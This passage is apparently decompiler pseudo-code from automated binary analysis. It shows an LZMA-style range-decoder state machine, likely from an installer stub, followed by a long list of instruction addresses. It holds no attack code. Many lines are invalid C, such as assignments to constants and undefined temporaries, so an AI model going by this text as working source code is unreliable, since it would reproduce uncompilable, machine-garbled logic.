											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                0x00406481
                0x00406481
                0x00406481
                0x00406481
                0x00406487
                0x0040648b
                0x0040648f
                0x00406499
                0x004064a7
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x004067b4
                0x004067b4
                0x004067b8
                0x00000000
                0x00000000
                0x004067ba
                0x004067c3
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067db
                0x004067f4
                0x004067f7
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067ec
                0x004067ef
                0x004067ef
                0x00406811
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b8
                0x00000000
                0x00000000
                0x00000000
                0x00406813
                0x00406813
                0x0040678c
                0x00406790
                0x004068c8
                0x004068c8
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x004068ee
                0x00406796
                0x0040679c
                0x004067a3
                0x004067ab
                0x004067ab
                0x004067ae
                0x00000000
                0x004067ae
                0x00406818
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00406734
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00405edf
                0x00000000
                0x00405ee6
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef0
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4b
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f95
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fbf
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x0040684a
                0x00000000
                0x0040684a
                0x00406005
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406709
                0x0040670d
                0x004068bc
                0x004068bc
                0x00000000
                0x004068bc
                0x00406713
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00000000
                0x00000000
                0x0040604c
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x00000000
                0x004060d9
                0x00406053
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062eb
                0x004062ef
                0x0040630d
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00406398
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x00406409
                0x0040640d
                0x00406414
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626c
                0x0040626f
                0x00406272
